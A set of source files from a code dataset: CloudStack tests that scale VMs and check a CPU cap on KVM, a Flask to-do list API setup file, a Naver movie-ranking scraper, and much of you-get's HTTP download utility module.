1024,\n 'diskofferingstrictness': False,\n 'diskofferingid': self.disk_offering2.id\n }\n\n self.serviceOfferingWithDiskOfferingStrictnessFalse2 = ServiceOffering.create(\n self.apiclient,\n offering_data,\n )\n self._cleanup.append(self.serviceOfferingWithDiskOfferingStrictnessFalse2)\n cmd = scaleVirtualMachine.scaleVirtualMachineCmd()\n cmd.id = self.virtual_machine_with_diskoffering_strictness_false.id\n cmd.serviceofferingid = self.serviceOfferingWithDiskOfferingStrictnessFalse2.id\n self.apiclient.scaleVirtualMachine(cmd)\n\n list_vm_response = VirtualMachine.list(\n self.apiclient,\n id=self.virtual_machine_with_diskoffering_strictness_false.id\n )\n\n vm_response = list_vm_response[0]\n self.assertEqual(\n vm_response.id,\n self.virtual_machine_with_diskoffering_strictness_false.id,\n \"Check virtual machine ID of upgraded VM\"\n )\n\n self.assertEqual(\n vm_response.serviceofferingid,\n self.serviceOfferingWithDiskOfferingStrictnessFalse2.id,\n \"Check service offering of the VM\"\n )\n\n if self.hypervisor.lower() == \"vmware\":\n 
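# restore the vmware.create.full.clone values captured at the start of this test\n            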
self.updateVmwareCreateFullCloneSetting(True)\n\n        return\n\n    def updateVmwareCreateFullCloneSetting(self, tearDown):\n        if not tearDown:\n            Configurations.update(self.apiclient,\n                                  \"vmware.create.full.clone\",\n                                  \"true\")\n            allStoragePools = StoragePool.list(\n                self.apiclient\n            )\n            for pool in allStoragePools:\n                Configurations.update(self.apiclient,\n                                      storageid=pool.id,\n                                      name=\"vmware.create.full.clone\",\n                                      value=\"true\")\n        else:\n            # restore the global and per-pool values saved before the test ran\n            Configurations.update(self.apiclient,\n                                  \"vmware.create.full.clone\",\n                                  self.fullClone[0].value.lower())\n            allStoragePools = StoragePool.list(\n                self.apiclient\n            )\n            for pool in allStoragePools:\n                Configurations.update(self.apiclient,\n                                      storageid=pool.id,\n                                      name=\"vmware.create.full.clone\",\n                                      value=self.storeCloneValues[pool.id])\n\nclass TestCpuCapServiceOfferings(cloudstackTestCase):\n\n    def setUp(self):\n        self.apiclient = self.testClient.getApiClient()\n        self.dbclient = self.testClient.getDbConnection()\n        self.cleanup = []\n\n    def tearDown(self):\n        try:\n            # Clean up, terminate the created templates\n            cleanup_resources(self.apiclient, self.cleanup)\n\n        except Exception as e:\n            raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n\n        return\n\n    def get_ssh_client(self, id, public_ip, username, password, retries):\n        \"\"\" Setup ssh client connection and return connection\n        vm requires attributes public_ip, public_port, username, password \"\"\"\n\n        try:\n            ssh_client = SshClient(\n                public_ip,\n                22,\n                username,\n                password,\n                retries)\n\n        except Exception as e:\n            self.fail(\"Unable to create ssh connection: %s\" % e)\n\n        self.assertIsNotNone(\n            ssh_client, \"Failed to setup ssh connection to host=%s on public_ip=%s\" % (id, public_ip))\n\n        return ssh_client\n\n    @classmethod\n    def setUpClass(cls):\n        testClient = super(TestCpuCapServiceOfferings, cls).getClsTestClient()\n        cls.apiclient = testClient.getApiClient()\n        cls.services = testClient.getParsedTestDataConfig()\n        cls.hypervisor = testClient.getHypervisorInfo()\n        cls._cleanup = []\n        cls.hypervisorNotSupported = False\n        if cls.hypervisor.lower() not in [\"kvm\"]:\n            cls.hypervisorNotSupported = True\n            return\n\n        domain = get_domain(cls.apiclient)\n        cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())\n        cls.services['mode'] = cls.zone.networktype\n\n        template = get_test_template(cls.apiclient, cls.zone.id, cls.hypervisor)\n        if template == FAILED:\n            assert False, \"get_test_template() failed to return template\"\n\n        cls.services[\"small\"][\"zoneid\"] = cls.zone.id\n        cls.services[\"small\"][\"template\"] = template.id\n        cls.services[\"small\"][\"hypervisor\"] = cls.hypervisor\n        cls.hostConfig = cls.config.__dict__[\"zones\"][0].__dict__[\"pods\"][0].__dict__[\"clusters\"][0].__dict__[\"hosts\"][0].__dict__\n\n        cls.account = Account.create(\n            cls.apiclient,\n            cls.services[\"account\"],\n            domainid=domain.id\n        )\n\n        offering_data = {\n            'displaytext': 'TestOffering',\n            'cpuspeed': 512,\n            'cpunumber': 2,\n            'name': 'TestOffering',\n            'memory': 1024\n        }\n\n        # limitcpuuse=True makes the hypervisor enforce the CPU cap verified below\n        cls.offering = ServiceOffering.create(\n            cls.apiclient,\n            offering_data,\n            limitcpuuse=True\n        )\n\n        def getHost(self, hostId=None):\n            response = list_hosts(\n                self.apiclient,\n                type='Routing',\n                hypervisor='kvm',\n                id=hostId\n            )\n            # Check if more than one kvm hosts are available in order to successfully configure host-ha\n            if response and len(response) > 0:\n                self.host = response[0]\n                return self.host\n            raise self.skipTest(\"Not enough KVM hosts found, skipping host-ha test\")\n\n        cls.host = getHost(cls)\n\n        cls.vm = VirtualMachine.create(\n            
cls.apiclient,\n cls.services[\"small\"],\n accountid=cls.account.name,\n domainid=cls.account.domainid,\n serviceofferingid=cls.offering.id,\n mode=cls.services[\"mode\"],\n hostid=cls.host.id\n\n )\n cls._cleanup = [\n cls.offering,\n cls.account\n ]\n\n @classmethod\n def tearDownClass(cls):\n try:\n cls.apiclient = super(\n TestCpuCapServiceOfferings,\n cls).getClsTestClient().getApiClient()\n # Clean up, terminate the created templates\n cleanup_resources(cls.apiclient, cls._cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n return\n\n @skipTestIf(\"hypervisorNotSupported\")\n @attr(tags=[\"advanced\", \"advancedns\", \"smoke\"], required_hardware=\"true\")\n def test_01_service_offering_cpu_limit_use(self):\n \"\"\"\n Test CPU Cap on KVM\n \"\"\"\n\n ssh_host = self.get_ssh_client(self.host.id, self.host.ipaddress, self.hostConfig[\"username\"], self.hostConfig[\"password\"], 10)\n\n #Get host CPU usage from top command before and after VM consuming 100% CPU\n find_pid_cmd = \"ps -ax | grep '%s' | head -1 | awk '{print $1}'\" % self.vm.id\n pid = ssh_host.execute(find_pid_cmd)[0]\n cpu_usage_cmd = \"top -b n 1 p %s | tail -1 | awk '{print $9}'\" % pid\n host_cpu_usage_before_str = ssh_host.execute(cpu_usage_cmd)[0]\n\n host_cpu_usage_before = round(float(host_cpu_usage_before_str))\n self.debug(\"Host CPU usage before the infinite loop on the VM: \" + str(host_cpu_usage_before))\n\n #Execute loop command in background on the VM\n ssh_vm = self.vm.get_ssh_client(reconnect=True)\n ssh_vm.execute(\"echo 'while true; do x=$(($x+1)); done' > cputest.sh\")\n ssh_vm.execute(\"sh cputest.sh > /dev/null 2>&1 &\")\n\n time.sleep(5)\n host_cpu_usage_after_str = ssh_host.execute(cpu_usage_cmd)[0]\n host_cpu_usage_after = round(float(host_cpu_usage_after_str))\n self.debug(\"Host CPU usage after the infinite loop on the VM: \" + str(host_cpu_usage_after))\n\n limit = 95\n self.assertTrue(host_cpu_usage_after < limit, \"Host CPU usage after VM usage increased is high\")\n\n return\n","repo_name":"apache/cloudstack","sub_path":"test/integration/smoke/test_service_offerings.py","file_name":"test_service_offerings.py","file_ext":"py","file_size_in_byte":36997,"program_lang":"python","lang":"en","doc_type":"code","stars":1557,"dataset":"github-code","pt":"32"} +{"seq_id":"36246499750","text":"import os\nimport secrets\n\nfrom flask import Flask\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_restx import Api\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# init SQLAlchemy so we can use it later in our models\ndb = SQLAlchemy()\n\napp = Flask(__name__)\napp.wsgi_app = ProxyFix(app.wsgi_app)\napi = Api(app,\n title='TO-DO LIST API',\n version='1.0',\n description='To-Do List API with Python-Flask',\n\tcontact='Berker Acir',\n\tcontact_email='berkeracir159@gmail.com'\n)\n\napp.config['SECRET_KEY'] = secrets.token_urlsafe(16)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n \ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\nimport models\nwith app.app_context():\n\tdb.create_all()\n\n@login_manager.user_loader\ndef load_user(user_id):\n\t# since the user_id is just the primary key of our user table, use it in the query for the user\n\treturn 
models.User.query.get(int(user_id))\n\nfrom auth import api as auth_ns\napi.add_namespace(auth_ns)\n\nfrom todo_lists import api as todo_lists_ns\napi.add_namespace(todo_lists_ns)\n\nfrom todo_list import api as todo_list_ns\napi.add_namespace(todo_list_ns)\n\n\nif __name__ == '__main__':\n\tapp.run()","repo_name":"berkeracir/to-do_list_api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30766536656","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\nhtml = urllib.request.urlopen('http://movie.naver.com/movie/sdb/rank/rmovie.nhn')\nsoup = BeautifulSoup(html,'html.parser')\n\nindex = 1\nf = open('output_1.csv', 'w', encoding='utf-8')\nfor tr in soup.tbody.find_all('tr'):\n if tr.find('div', attrs={'class':\"tit3\"}):\n # try:\n print([str(index), tr.a['title'], tr.find('img', attrs=({\"class\":\"arrow\"})).attrs['alt']+tr.find('td', attrs={'class':\"range ac\"}).string])\n f.write('{0}, {1}, {2}, {3}\\n'.format(str(index), tr.a['title'], tr.find('img', attrs=({\"width\":\"7\"})).attrs['alt'],tr.find('td', attrs={'class':\"range ac\"}).string))\n index = index + 1\n # except: pass\nf.close()","repo_name":"sss6391/iot_python2019","sub_path":"03_Bigdata/01_Collection/03_Web_crawling/01_Beautiful_Soup/3_naver_movie_1.py","file_name":"3_naver_movie_1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"192222713","text":"#!/usr/bin/env python\n\nimport io\nimport os\nimport re\nimport sys\nimport time\nimport json\nimport socket\nimport locale\nimport logging\nimport argparse\nimport ssl\nfrom http import cookiejar\nfrom importlib import import_module\nfrom urllib import request, parse, error\n\nfrom .version import __version__\nfrom .util import log, term\nfrom .util.git import get_version\nfrom .util.strings import get_filename, unescape_html\nfrom . 
import json_output as json_output_\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf8')\n\nSITES = {\n '163' : 'netease',\n '56' : 'w56',\n '365yg' : 'toutiao',\n 'acfun' : 'acfun',\n 'archive' : 'archive',\n 'baidu' : 'baidu',\n 'bandcamp' : 'bandcamp',\n 'baomihua' : 'baomihua',\n 'bigthink' : 'bigthink',\n 'bilibili' : 'bilibili',\n 'cctv' : 'cntv',\n 'cntv' : 'cntv',\n 'cbs' : 'cbs',\n 'coub' : 'coub',\n 'dailymotion' : 'dailymotion',\n 'douban' : 'douban',\n 'douyin' : 'douyin',\n 'douyu' : 'douyutv',\n 'ehow' : 'ehow',\n 'facebook' : 'facebook',\n 'fc2' : 'fc2video',\n 'flickr' : 'flickr',\n 'freesound' : 'freesound',\n 'fun' : 'funshion',\n 'google' : 'google',\n 'giphy' : 'giphy',\n 'heavy-music' : 'heavymusic',\n 'huomao' : 'huomaotv',\n 'iask' : 'sina',\n 'icourses' : 'icourses',\n 'ifeng' : 'ifeng',\n 'imgur' : 'imgur',\n 'in' : 'alive',\n 'infoq' : 'infoq',\n 'instagram' : 'instagram',\n 'interest' : 'interest',\n 'iqilu' : 'iqilu',\n 'iqiyi' : 'iqiyi',\n 'ixigua' : 'ixigua',\n 'isuntv' : 'suntv',\n 'iwara' : 'iwara',\n 'joy' : 'joy',\n 'kankanews' : 'bilibili',\n 'kakao' : 'kakao',\n 'khanacademy' : 'khan',\n 'ku6' : 'ku6',\n 'kuaishou' : 'kuaishou',\n 'kugou' : 'kugou',\n 'kuwo' : 'kuwo',\n 'le' : 'le',\n 'letv' : 'le',\n 'lizhi' : 'lizhi',\n 'longzhu' : 'longzhu',\n 'lrts' : 'lrts',\n 'magisto' : 'magisto',\n 'metacafe' : 'metacafe',\n 'mgtv' : 'mgtv',\n 'miomio' : 'miomio',\n 'missevan' : 'missevan',\n 'mixcloud' : 'mixcloud',\n 'mtv81' : 'mtv81',\n 'miaopai' : 'yixia',\n 'naver' : 'naver',\n '7gogo' : 'nanagogo',\n 'nicovideo' : 'nicovideo',\n 'pinterest' : 'pinterest',\n 'pixnet' : 'pixnet',\n 'pptv' : 'pptv',\n 'qingting' : 'qingting',\n 'qq' : 'qq',\n 'showroom-live' : 'showroom',\n 'sina' : 'sina',\n 'smgbb' : 'bilibili',\n 'sohu' : 'sohu',\n 'soundcloud' : 'soundcloud',\n 'ted' : 'ted',\n 'theplatform' : 'theplatform',\n 'tiktok' : 'tiktok',\n 'tucao' : 'tucao',\n 'tudou' : 'tudou',\n 'tumblr' : 'tumblr',\n 'twimg' : 'twitter',\n 'twitter' : 'twitter',\n 'ucas' : 'ucas',\n 'vimeo' : 'vimeo',\n 'wanmen' : 'wanmen',\n 'weibo' : 'miaopai',\n 'veoh' : 'veoh',\n 'vine' : 'vine',\n 'vk' : 'vk',\n 'xiaokaxiu' : 'yixia',\n 'xiaojiadianvideo' : 'fc2video',\n 'ximalaya' : 'ximalaya',\n 'xinpianchang' : 'xinpianchang',\n 'yizhibo' : 'yizhibo',\n 'youku' : 'youku',\n 'youtu' : 'youtube',\n 'youtube' : 'youtube',\n 'zhanqi' : 'zhanqi',\n 'zhibo' : 'zhibo',\n 'zhihu' : 'zhihu',\n}\n\ndry_run = False\njson_output = False\nforce = False\nskip_existing_file_size_check = False\nplayer = None\nextractor_proxy = None\ncookies = None\noutput_filename = None\nauto_rename = False\ninsecure = False\nm3u8 = False\npostfix = False\nprefix = None\n\nfake_headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'UTF-8,*;q=0.5',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183' # Latest Edge\n}\n\nif sys.stdout.isatty():\n default_encoding = sys.stdout.encoding.lower()\nelse:\n default_encoding = locale.getpreferredencoding().lower()\n\n\ndef rc4(key, data):\n # all encryption algo should work on bytes\n assert type(key) == type(data) and type(key) == type(b'')\n state = list(range(256))\n j = 0\n for i in range(256):\n j += state[i] + key[i % len(key)]\n j &= 0xff\n state[i], state[j] = state[j], state[i]\n\n i = 0\n j = 0\n out_list = []\n for char in 
data:\n i += 1\n i &= 0xff\n j += state[i]\n j &= 0xff\n state[i], state[j] = state[j], state[i]\n prn = state[(state[i] + state[j]) & 0xff]\n out_list.append(char ^ prn)\n\n return bytes(out_list)\n\n\ndef general_m3u8_extractor(url, headers={}):\n m3u8_list = get_content(url, headers=headers).split('\\n')\n urls = []\n for line in m3u8_list:\n line = line.strip()\n if line and not line.startswith('#'):\n if line.startswith('http'):\n urls.append(line)\n else:\n seg_url = parse.urljoin(url, line)\n urls.append(seg_url)\n return urls\n\n\ndef maybe_print(*s):\n try:\n print(*s)\n except:\n pass\n\n\ndef tr(s):\n if default_encoding == 'utf-8':\n return s\n else:\n return s\n # return str(s.encode('utf-8'))[2:-1]\n\n\n# DEPRECATED in favor of match1()\ndef r1(pattern, text):\n m = re.search(pattern, text)\n if m:\n return m.group(1)\n\n\n# DEPRECATED in favor of match1()\ndef r1_of(patterns, text):\n for p in patterns:\n x = r1(p, text)\n if x:\n return x\n\n\ndef match1(text, *patterns):\n \"\"\"Scans through a string for substrings matched some patterns (first-subgroups only).\n\n Args:\n text: A string to be scanned.\n patterns: Arbitrary number of regex patterns.\n\n Returns:\n When only one pattern is given, returns a string (None if no match found).\n When more than one pattern are given, returns a list of strings ([] if no match found).\n \"\"\"\n\n if len(patterns) == 1:\n pattern = patterns[0]\n match = re.search(pattern, text)\n if match:\n return match.group(1)\n else:\n return None\n else:\n ret = []\n for pattern in patterns:\n match = re.search(pattern, text)\n if match:\n ret.append(match.group(1))\n return ret\n\n\ndef matchall(text, patterns):\n \"\"\"Scans through a string for substrings matched some patterns.\n\n Args:\n text: A string to be scanned.\n patterns: a list of regex pattern.\n\n Returns:\n a list if matched. 
empty if not.\n \"\"\"\n\n ret = []\n for pattern in patterns:\n match = re.findall(pattern, text)\n ret += match\n\n return ret\n\n\ndef launch_player(player, urls):\n import subprocess\n import shlex\n urls = list(urls)\n for url in urls.copy():\n if type(url) is list:\n urls.extend(url)\n urls = [url for url in urls if type(url) is str]\n assert urls\n if (sys.version_info >= (3, 3)):\n import shutil\n exefile=shlex.split(player)[0]\n if shutil.which(exefile) is not None:\n subprocess.call(shlex.split(player) + urls)\n else:\n log.wtf('[Failed] Cannot find player \"%s\"' % exefile)\n else:\n subprocess.call(shlex.split(player) + urls)\n\n\ndef parse_query_param(url, param):\n \"\"\"Parses the query string of a URL and returns the value of a parameter.\n\n Args:\n url: A URL.\n param: A string representing the name of the parameter.\n\n Returns:\n The value of the parameter.\n \"\"\"\n\n try:\n return parse.parse_qs(parse.urlparse(url).query)[param][0]\n except:\n return None\n\n\ndef unicodize(text):\n return re.sub(\n r'\\\\u([0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f])',\n lambda x: chr(int(x.group(0)[2:], 16)),\n text\n )\n\n\n# DEPRECATED in favor of util.legitimize()\ndef escape_file_path(path):\n path = path.replace('/', '-')\n path = path.replace('\\\\', '-')\n path = path.replace('*', '-')\n path = path.replace('?', '-')\n return path\n\n\ndef ungzip(data):\n \"\"\"Decompresses data for Content-Encoding: gzip.\n \"\"\"\n from io import BytesIO\n import gzip\n buffer = BytesIO(data)\n f = gzip.GzipFile(fileobj=buffer)\n return f.read()\n\n\ndef undeflate(data):\n \"\"\"Decompresses data for Content-Encoding: deflate.\n (the zlib compression is used.)\n \"\"\"\n import zlib\n decompressobj = zlib.decompressobj(-zlib.MAX_WBITS)\n return decompressobj.decompress(data)+decompressobj.flush()\n\n\n# an http.client implementation of get_content()\n# because urllib does not support \"Connection: keep-alive\"\ndef getHttps(host, url, headers, debuglevel=0):\n import http.client\n\n conn = http.client.HTTPSConnection(host)\n conn.set_debuglevel(debuglevel)\n conn.request(\"GET\", url, headers=headers)\n resp = conn.getresponse()\n set_cookie = resp.getheader('set-cookie')\n\n data = resp.read()\n try:\n data = ungzip(data) # gzip\n data = undeflate(data) # deflate\n except:\n pass\n\n conn.close()\n return str(data, encoding='utf-8'), set_cookie\n\n\n# DEPRECATED in favor of get_content()\ndef get_response(url, faker=False):\n logging.debug('get_response: %s' % url)\n ctx = None\n if insecure:\n # ignore ssl errors\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n # install cookies\n if cookies:\n opener = request.build_opener(request.HTTPCookieProcessor(cookies))\n request.install_opener(opener)\n\n if faker:\n response = request.urlopen(\n request.Request(url, headers=fake_headers), None, context=ctx,\n )\n else:\n response = request.urlopen(url, context=ctx)\n\n data = response.read()\n if response.info().get('Content-Encoding') == 'gzip':\n data = ungzip(data)\n elif response.info().get('Content-Encoding') == 'deflate':\n data = undeflate(data)\n response.data = data\n return response\n\n\n# DEPRECATED in favor of get_content()\ndef get_html(url, encoding=None, faker=False):\n content = get_response(url, faker).data\n return str(content, 'utf-8', 'ignore')\n\n\n# DEPRECATED in favor of get_content()\ndef get_decoded_html(url, faker=False):\n response = get_response(url, faker)\n data = response.data\n charset = 
r1(r'charset=([\\w-]+)', response.headers['content-type'])\n if charset:\n return data.decode(charset, 'ignore')\n else:\n return data\n\n\ndef get_location(url, headers=None, get_method='HEAD'):\n logging.debug('get_location: %s' % url)\n\n if headers:\n req = request.Request(url, headers=headers)\n else:\n req = request.Request(url)\n req.get_method = lambda: get_method\n res = urlopen_with_retry(req)\n return res.geturl()\n\n\ndef urlopen_with_retry(*args, **kwargs):\n retry_time = 3\n for i in range(retry_time):\n try:\n if insecure:\n # ignore ssl errors\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n return request.urlopen(*args, context=ctx, **kwargs)\n else:\n return request.urlopen(*args, **kwargs)\n except socket.timeout as e:\n logging.debug('request attempt %s timeout' % str(i + 1))\n if i + 1 == retry_time:\n raise e\n # try to tackle youku CDN fails\n except error.HTTPError as http_error:\n logging.debug('HTTP Error with code{}'.format(http_error.code))\n if i + 1 == retry_time:\n raise http_error\n\n\ndef get_content(url, headers={}, decoded=True):\n \"\"\"Gets the content of a URL via sending a HTTP GET request.\n\n Args:\n url: A URL.\n headers: Request headers used by the client.\n decoded: Whether decode the response body using UTF-8 or the charset specified in Content-Type.\n\n Returns:\n The content as a string.\n \"\"\"\n\n logging.debug('get_content: %s' % url)\n\n req = request.Request(url, headers=headers)\n if cookies:\n # NOTE: Do not use cookies.add_cookie_header(req)\n # #HttpOnly_ cookies were not supported by CookieJar and MozillaCookieJar properly until python 3.10\n # See also:\n # - https://github.com/python/cpython/pull/17471\n # - https://bugs.python.org/issue2190\n # Here we add cookies to the request headers manually\n cookie_strings = []\n for cookie in list(cookies):\n cookie_strings.append(cookie.name + '=' + cookie.value)\n cookie_headers = {'Cookie': '; '.join(cookie_strings)}\n req.headers.update(cookie_headers)\n\n response = urlopen_with_retry(req)\n data = response.read()\n\n # Handle HTTP compression for gzip and deflate (zlib)\n content_encoding = response.getheader('Content-Encoding')\n if content_encoding == 'gzip':\n data = ungzip(data)\n elif content_encoding == 'deflate':\n data = undeflate(data)\n\n # Decode the response body\n if decoded:\n charset = match1(\n response.getheader('Content-Type', ''), r'charset=([\\w-]+)'\n )\n if charset is not None:\n data = data.decode(charset, 'ignore')\n else:\n data = data.decode('utf-8', 'ignore')\n\n return data\n\n\ndef post_content(url, headers={}, post_data={}, decoded=True, **kwargs):\n \"\"\"Post the content of a URL via sending a HTTP POST request.\n\n Args:\n url: A URL.\n headers: Request headers used by the client.\n decoded: Whether decode the response body using UTF-8 or the charset specified in Content-Type.\n\n Returns:\n The content as a string.\n \"\"\"\n if kwargs.get('post_data_raw'):\n logging.debug('post_content: %s\\npost_data_raw: %s' % (url, kwargs['post_data_raw']))\n else:\n logging.debug('post_content: %s\\npost_data: %s' % (url, post_data))\n\n req = request.Request(url, headers=headers)\n if cookies:\n # NOTE: Do not use cookies.add_cookie_header(req)\n # #HttpOnly_ cookies were not supported by CookieJar and MozillaCookieJar properly until python 3.10\n # See also:\n # - https://github.com/python/cpython/pull/17471\n # - https://bugs.python.org/issue2190\n # Here we add cookies to the request headers manually\n 
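# (same manual Cookie-header approach as in get_content above)\n        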
cookie_strings = []\n for cookie in list(cookies):\n cookie_strings.append(cookie.name + '=' + cookie.value)\n cookie_headers = {'Cookie': '; '.join(cookie_strings)}\n req.headers.update(cookie_headers)\n if kwargs.get('post_data_raw'):\n post_data_enc = bytes(kwargs['post_data_raw'], 'utf-8')\n else:\n post_data_enc = bytes(parse.urlencode(post_data), 'utf-8')\n response = urlopen_with_retry(req, data=post_data_enc)\n data = response.read()\n\n # Handle HTTP compression for gzip and deflate (zlib)\n content_encoding = response.getheader('Content-Encoding')\n if content_encoding == 'gzip':\n data = ungzip(data)\n elif content_encoding == 'deflate':\n data = undeflate(data)\n\n # Decode the response body\n if decoded:\n charset = match1(\n response.getheader('Content-Type'), r'charset=([\\w-]+)'\n )\n if charset is not None:\n data = data.decode(charset)\n else:\n data = data.decode('utf-8')\n\n return data\n\n\ndef url_size(url, faker=False, headers={}):\n if faker:\n response = urlopen_with_retry(\n request.Request(url, headers=fake_headers)\n )\n elif headers:\n response = urlopen_with_retry(request.Request(url, headers=headers))\n else:\n response = urlopen_with_retry(url)\n\n size = response.headers['content-length']\n return int(size) if size is not None else float('inf')\n\n\ndef urls_size(urls, faker=False, headers={}):\n return sum([url_size(url, faker=faker, headers=headers) for url in urls])\n\n\ndef get_head(url, headers=None, get_method='HEAD'):\n logging.debug('get_head: %s' % url)\n\n if headers:\n req = request.Request(url, headers=headers)\n else:\n req = request.Request(url)\n req.get_method = lambda: get_method\n res = urlopen_with_retry(req)\n return res.headers\n\n\ndef url_info(url, faker=False, headers={}):\n logging.debug('url_info: %s' % url)\n\n if faker:\n response = urlopen_with_retry(\n request.Request(url, headers=fake_headers)\n )\n elif headers:\n response = urlopen_with_retry(request.Request(url, headers=headers))\n else:\n response = urlopen_with_retry(request.Request(url))\n\n headers = response.headers\n\n type = headers['content-type']\n if type == 'image/jpg; charset=UTF-8' or type == 'image/jpg':\n type = 'audio/mpeg' # fix for netease\n mapping = {\n 'video/3gpp': '3gp',\n 'video/f4v': 'flv',\n 'video/mp4': 'mp4',\n 'video/MP2T': 'ts',\n 'video/quicktime': 'mov',\n 'video/webm': 'webm',\n 'video/x-flv': 'flv',\n 'video/x-ms-asf': 'asf',\n 'audio/mp4': 'mp4',\n 'audio/mpeg': 'mp3',\n 'audio/wav': 'wav',\n 'audio/x-wav': 'wav',\n 'audio/wave': 'wav',\n 'image/jpeg': 'jpg',\n 'image/png': 'png',\n 'image/gif': 'gif',\n 'application/pdf': 'pdf',\n }\n if type in mapping:\n ext = mapping[type]\n else:\n type = None\n if headers['content-disposition']:\n try:\n filename = parse.unquote(\n r1(r'filename=\"?([^\"]+)\"?', headers['content-disposition'])\n )\n if len(filename.split('.')) > 1:\n ext = filename.split('.')[-1]\n else:\n ext = None\n except:\n ext = None\n else:\n ext = None\n\n if headers['transfer-encoding'] != 'chunked':\n size = headers['content-length'] and int(headers['content-length'])\n else:\n size = None\n\n return type, ext, size\n\n\ndef url_locations(urls, faker=False, headers={}):\n locations = []\n for url in urls:\n logging.debug('url_locations: %s' % url)\n\n if faker:\n response = urlopen_with_retry(\n request.Request(url, headers=fake_headers)\n )\n elif headers:\n response = urlopen_with_retry(\n request.Request(url, headers=headers)\n )\n else:\n response = urlopen_with_retry(request.Request(url))\n\n 
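# response.url is the final URL after any HTTP redirects\n        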
locations.append(response.url)\n return locations\n\n\ndef url_save(\n url, filepath, bar, refer=None, is_part=False, faker=False,\n headers=None, timeout=None, **kwargs\n):\n tmp_headers = headers.copy() if headers is not None else {}\n # When a referer specified with param refer,\n # the key must be 'Referer' for the hack here\n if refer is not None:\n tmp_headers['Referer'] = refer\n if type(url) is list:\n chunk_sizes = [url_size(url, faker=faker, headers=tmp_headers) for url in url]\n file_size = sum(chunk_sizes)\n is_chunked, urls = True, url\n else:\n file_size = url_size(url, faker=faker, headers=tmp_headers)\n chunk_sizes = [file_size]\n is_chunked, urls = False, [url]\n\n continue_renameing = True\n while continue_renameing:\n continue_renameing = False\n if os.path.exists(filepath):\n if not force and (file_size == os.path.getsize(filepath) or skip_existing_file_size_check):\n if not is_part:\n if bar:\n bar.done()\n if skip_existing_file_size_check:\n log.w(\n 'Skipping {} without checking size: file already exists'.format(\n tr(os.path.basename(filepath))\n )\n )\n else:\n log.w(\n 'Skipping {}: file already exists'.format(\n tr(os.path.basename(filepath))\n )\n )\n else:\n if bar:\n bar.update_received(file_size)\n return\n else:\n if not is_part:\n if bar:\n bar.done()\n if not force and auto_rename:\n path, ext = os.path.basename(filepath).rsplit('.', 1)\n finder = re.compile(' \\([1-9]\\d*?\\)$')\n if (finder.search(path) is None):\n thisfile = path + ' (1).' + ext\n else:\n def numreturn(a):\n return ' (' + str(int(a.group()[2:-1]) + 1) + ').'\n thisfile = finder.sub(numreturn, path) + ext\n filepath = os.path.join(os.path.dirname(filepath), thisfile)\n print('Changing name to %s' % tr(os.path.basename(filepath)), '...')\n continue_renameing = True\n continue\n if log.yes_or_no('File with this name already exists. Overwrite?'):\n log.w('Overwriting %s ...' 
% tr(os.path.basename(filepath)))\n else:\n return\n elif not os.path.exists(os.path.dirname(filepath)):\n os.mkdir(os.path.dirname(filepath))\n\n temp_filepath = filepath + '.download' if file_size != float('inf') \\\n else filepath\n received = 0\n if not force:\n open_mode = 'ab'\n\n if os.path.exists(temp_filepath):\n received += os.path.getsize(temp_filepath)\n if bar:\n bar.update_received(os.path.getsize(temp_filepath))\n else:\n open_mode = 'wb'\n\n chunk_start = 0\n chunk_end = 0\n for i, url in enumerate(urls):\n received_chunk = 0\n chunk_start += 0 if i == 0 else chunk_sizes[i - 1]\n chunk_end += chunk_sizes[i]\n if received < file_size and received < chunk_end:\n if faker:\n tmp_headers = fake_headers\n '''\n if parameter headers passed in, we have it copied as tmp_header\n elif headers:\n headers = headers\n else:\n headers = {}\n '''\n if received:\n # chunk_start will always be 0 if not chunked\n tmp_headers['Range'] = 'bytes=' + str(received - chunk_start) + '-'\n if refer:\n tmp_headers['Referer'] = refer\n\n if timeout:\n response = urlopen_with_retry(\n request.Request(url, headers=tmp_headers), timeout=timeout\n )\n else:\n response = urlopen_with_retry(\n request.Request(url, headers=tmp_headers)\n )\n try:\n range_start = int(\n response.headers[\n 'content-range'\n ][6:].split('/')[0].split('-')[0]\n )\n end_length = int(\n response.headers['content-range'][6:].split('/')[1]\n )\n range_length = end_length - range_start\n except:\n content_length = response.headers['content-length']\n range_length = int(content_length) if content_length is not None \\\n else float('inf')\n\n if is_chunked: # always append if chunked\n open_mode = 'ab'\n elif file_size != received + range_length: # is it ever necessary?\n received = 0\n if bar:\n bar.received = 0\n open_mode = 'wb'\n\n with open(temp_filepath, open_mode) as output:\n while True:\n buffer = None\n try:\n buffer = response.read(1024 * 256)\n except socket.timeout:\n pass\n if not buffer:\n if is_chunked and received_chunk == range_length:\n break\n elif not is_chunked and received == file_size: # Download finished\n break\n # Unexpected termination. 
